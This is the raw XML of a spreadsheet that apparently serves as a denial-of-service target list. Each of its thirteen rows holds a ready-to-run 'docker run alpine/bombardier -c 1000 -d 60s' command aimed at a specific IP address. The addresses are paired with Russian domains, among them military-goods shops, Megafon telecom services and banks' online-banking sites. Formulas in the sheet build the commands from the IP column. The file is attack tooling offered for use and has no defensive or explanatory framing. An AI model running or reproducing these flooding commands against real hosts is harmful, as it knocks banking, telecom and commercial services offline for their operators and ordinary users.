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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="39">
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.127.241.214 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>188.127.241.214</t>
  </si>
  <si>
    <t>hakki.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.183.14.26 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>95.183.14.26</t>
  </si>
  <si>
    <t>militarka.com</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.170.244.247  &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t xml:space="preserve">178.170.244.247 </t>
  </si>
  <si>
    <t>voentorg-sklad.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 84.252.141.29 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>84.252.141.29</t>
  </si>
  <si>
    <t>voen-torg.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.162.60.199 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>188.162.60.199</t>
  </si>
  <si>
    <t>plus.megafon.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.232.168.27  &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t xml:space="preserve">193.232.168.27 </t>
  </si>
  <si>
    <t>money.megafon.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.227.73.6 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>188.227.73.6</t>
  </si>
  <si>
    <t>kiozk.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.232.168.26 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>193.232.168.26</t>
  </si>
  <si>
    <t>books.megafon.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.53.83.234  &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t xml:space="preserve">92.53.83.234 </t>
  </si>
  <si>
    <t>databank.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.198.68.51  &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t xml:space="preserve">91.198.68.51 </t>
  </si>
  <si>
    <t>online.databank.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.5.80.252  &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t xml:space="preserve">213.5.80.252 </t>
  </si>
  <si>
    <t>gebank.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.5.80.161  &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t xml:space="preserve">213.5.80.161 </t>
  </si>
  <si>
    <t>ib.gebank.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.5.80.137 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.5.80.137</t>
  </si>
  <si>
    <t>ibank.gebank.ru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</si>
</sst>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8.83333" defaultRowHeight="18" customHeight="1" outlineLevelRow="0" outlineLevelCol="0"/>
  <cols>
    <col min="1" max="1" width="92.5" style="1" customWidth="1"/>
    <col min="2" max="2" width="18.6719" style="1" customWidth="1"/>
    <col min="3" max="3" width="29.6719" style="1" customWidth="1"/>
    <col min="4" max="5" width="8.85156" style="1" customWidth="1"/>
    <col min="6" max="16384" width="8.85156" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="14.6" customHeight="1">
      <c r="A1" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B1&amp;" &amp;&amp; sleep 5;"</f>
        <v>0</v>
      </c>
      <c r="B1" t="s" s="2">
        <v>1</v>
      </c>
      <c r="C1" t="s" s="2">
        <v>2</v>
      </c>
      <c r="D1" s="3"/>
      <c r="E1" s="3"/>
    </row>
    <row r="2" ht="14.6" customHeight="1">
      <c r="A2" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B2&amp;" &amp;&amp; sleep 5;"</f>
        <v>3</v>
      </c>
      <c r="B2" t="s" s="2">
        <v>4</v>
      </c>
      <c r="C2" t="s" s="2">
        <v>5</v>
      </c>
      <c r="D2" s="3"/>
      <c r="E2" s="3"/>
    </row>
    <row r="3" ht="14.6" customHeight="1">
      <c r="A3" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B3&amp;" &amp;&amp; sleep 5;"</f>
        <v>6</v>
      </c>
      <c r="B3" t="s" s="2">
        <v>7</v>
      </c>
      <c r="C3" t="s" s="2">
        <v>8</v>
      </c>
      <c r="D3" s="3"/>
      <c r="E3" s="3"/>
    </row>
    <row r="4" ht="14.6" customHeight="1">
      <c r="A4" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B4&amp;" &amp;&amp; sleep 5;"</f>
        <v>9</v>
      </c>
      <c r="B4" t="s" s="2">
        <v>10</v>
      </c>
      <c r="C4" t="s" s="2">
        <v>11</v>
      </c>
      <c r="D4" s="3"/>
      <c r="E4" s="3"/>
    </row>
    <row r="5" ht="14.6" customHeight="1">
      <c r="A5" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B5&amp;" &amp;&amp; sleep 5;"</f>
        <v>12</v>
      </c>
      <c r="B5" t="s" s="2">
        <v>13</v>
      </c>
      <c r="C5" t="s" s="2">
        <v>14</v>
      </c>
      <c r="D5" s="3"/>
      <c r="E5" s="3"/>
    </row>
    <row r="6" ht="14.6" customHeight="1">
      <c r="A6" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B6&amp;" &amp;&amp; sleep 5;"</f>
        <v>15</v>
      </c>
      <c r="B6" t="s" s="2">
        <v>16</v>
      </c>
      <c r="C6" t="s" s="2">
        <v>17</v>
      </c>
      <c r="D6" s="3"/>
      <c r="E6" s="3"/>
    </row>
    <row r="7" ht="14.6" customHeight="1">
      <c r="A7" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B7&amp;" &amp;&amp; sleep 5;"</f>
        <v>18</v>
      </c>
      <c r="B7" t="s" s="2">
        <v>19</v>
      </c>
      <c r="C7" t="s" s="2">
        <v>20</v>
      </c>
      <c r="D7" s="3"/>
      <c r="E7" s="3"/>
    </row>
    <row r="8" ht="14.6" customHeight="1">
      <c r="A8" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B8&amp;" &amp;&amp; sleep 5;"</f>
        <v>21</v>
      </c>
      <c r="B8" t="s" s="2">
        <v>22</v>
      </c>
      <c r="C8" t="s" s="2">
        <v>23</v>
      </c>
      <c r="D8" s="3"/>
      <c r="E8" s="3"/>
    </row>
    <row r="9" ht="14.6" customHeight="1">
      <c r="A9" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B9&amp;" &amp;&amp; sleep 5;"</f>
        <v>24</v>
      </c>
      <c r="B9" t="s" s="2">
        <v>25</v>
      </c>
      <c r="C9" t="s" s="2">
        <v>26</v>
      </c>
      <c r="D9" s="3"/>
      <c r="E9" s="3"/>
    </row>
    <row r="10" ht="14.6" customHeight="1">
      <c r="A10" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B10&amp;" &amp;&amp; sleep 5;"</f>
        <v>27</v>
      </c>
      <c r="B10" t="s" s="2">
        <v>28</v>
      </c>
      <c r="C10" t="s" s="2">
        <v>29</v>
      </c>
      <c r="D10" s="3"/>
      <c r="E10" s="3"/>
    </row>
    <row r="11" ht="14.6" customHeight="1">
      <c r="A11" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B11&amp;" &amp;&amp; sleep 5;"</f>
        <v>30</v>
      </c>
      <c r="B11" t="s" s="2">
        <v>31</v>
      </c>
      <c r="C11" t="s" s="2">
        <v>32</v>
      </c>
      <c r="D11" s="3"/>
      <c r="E11" s="3"/>
    </row>
    <row r="12" ht="14.6" customHeight="1">
      <c r="A12" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B12&amp;" &amp;&amp; sleep 5;"</f>
        <v>33</v>
      </c>
      <c r="B12" t="s" s="2">
        <v>34</v>
      </c>
      <c r="C12" t="s" s="2">
        <v>35</v>
      </c>
      <c r="D12" s="3"/>
      <c r="E12" s="3"/>
    </row>
    <row r="13" ht="14.6" customHeight="1">
      <c r="A13" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B13&amp;" &amp;&amp; sleep 5;"</f>
        <v>36</v>
      </c>
      <c r="B13" t="s" s="2">
        <v>37</v>
      </c>
      <c r="C13" t="s" s="2">
        <v>38</v>
      </c>
      <c r="D13" s="3"/>
      <c r="E13" s="3"/>
    </row>
    <row r="14" ht="14.6" customHeight="1">
      <c r="A14" s="4"/>
      <c r="B14" s="5"/>
      <c r="C14" s="6"/>
      <c r="D14" s="3"/>
      <c r="E14" s="3"/>
    </row>
    <row r="15" ht="14.6" customHeight="1">
      <c r="A15" s="2"/>
      <c r="B15" s="7"/>
      <c r="C15" s="8"/>
      <c r="D15" s="3"/>
      <c r="E15" s="3"/>
    </row>
    <row r="16" ht="14.6" customHeight="1">
      <c r="A16" s="2"/>
      <c r="B16" s="7"/>
      <c r="C16" s="8"/>
      <c r="D16" s="3"/>
      <c r="E16" s="3"/>
    </row>
    <row r="17" ht="14.6" customHeight="1">
      <c r="A17" s="2"/>
      <c r="B17" s="7"/>
      <c r="C17" s="8"/>
      <c r="D17" s="3"/>
      <c r="E17" s="3"/>
    </row>
    <row r="18" ht="14.6" customHeight="1">
      <c r="A18" s="2"/>
      <c r="B18" s="9"/>
      <c r="C18" s="10"/>
      <c r="D18" s="3"/>
      <c r="E18" s="3"/>
    </row>
    <row r="19" ht="14.6" customHeight="1">
      <c r="A19" s="2"/>
      <c r="B19" s="2"/>
      <c r="C19" s="2"/>
      <c r="D19" s="3"/>
      <c r="E19" s="3"/>
    </row>
    <row r="20" ht="14.6" customHeight="1">
      <c r="A20" s="2"/>
      <c r="B20" s="2"/>
      <c r="C20" s="2"/>
      <c r="D20" s="3"/>
      <c r="E20" s="3"/>
    </row>
    <row r="21" ht="14.6" customHeight="1">
      <c r="A21" s="2"/>
      <c r="B21" s="2"/>
      <c r="C21" s="2"/>
      <c r="D21" s="3"/>
      <c r="E21" s="3"/>
    </row>
    <row r="22" ht="14.6" customHeight="1">
      <c r="A22" s="2"/>
      <c r="B22" s="2"/>
      <c r="C22" s="2"/>
      <c r="D22" s="3"/>
      <c r="E22" s="3"/>
    </row>
    <row r="23" ht="14.6" customHeight="1">
      <c r="A23" s="2"/>
      <c r="B23" s="2"/>
      <c r="C23" s="2"/>
      <c r="D23" s="3"/>
      <c r="E23" s="3"/>
    </row>
    <row r="24" ht="14.6" customHeight="1">
      <c r="A24" s="2"/>
      <c r="B24" s="2"/>
      <c r="C24" s="2"/>
      <c r="D24" s="3"/>
      <c r="E24" s="3"/>
    </row>
    <row r="25" ht="14.6" customHeight="1">
      <c r="A25" s="2"/>
      <c r="B25" s="2"/>
      <c r="C25" s="2"/>
      <c r="D25" s="3"/>
      <c r="E25" s="3"/>
    </row>
    <row r="26" ht="14.6" customHeight="1">
      <c r="A26" s="2"/>
      <c r="B26" s="2"/>
      <c r="C26" s="2"/>
      <c r="D26" s="3"/>
      <c r="E26" s="3"/>
    </row>
    <row r="27" ht="14.6" customHeight="1">
      <c r="A27" s="2"/>
      <c r="B27" s="2"/>
      <c r="C27" s="2"/>
      <c r="D27" s="3"/>
      <c r="E27" s="3"/>
    </row>
    <row r="28" ht="14.6" customHeight="1">
      <c r="A28" s="2"/>
      <c r="B28" s="2"/>
      <c r="C28" s="2"/>
      <c r="D28" s="3"/>
      <c r="E28" s="3"/>
    </row>
    <row r="29" ht="14.6" customHeight="1">
      <c r="A29" s="2"/>
      <c r="B29" s="2"/>
      <c r="C29" s="2"/>
      <c r="D29" s="3"/>
      <c r="E29" s="3"/>
    </row>
    <row r="30" ht="14.6" customHeight="1">
      <c r="A30" s="2"/>
      <c r="B30" s="2"/>
      <c r="C30" s="2"/>
      <c r="D30" s="3"/>
      <c r="E30" s="3"/>
    </row>
    <row r="31" ht="14.6" customHeight="1">
      <c r="A31" s="3"/>
      <c r="B31" s="3"/>
      <c r="C31" s="3"/>
      <c r="D31" s="3"/>
      <c r="E3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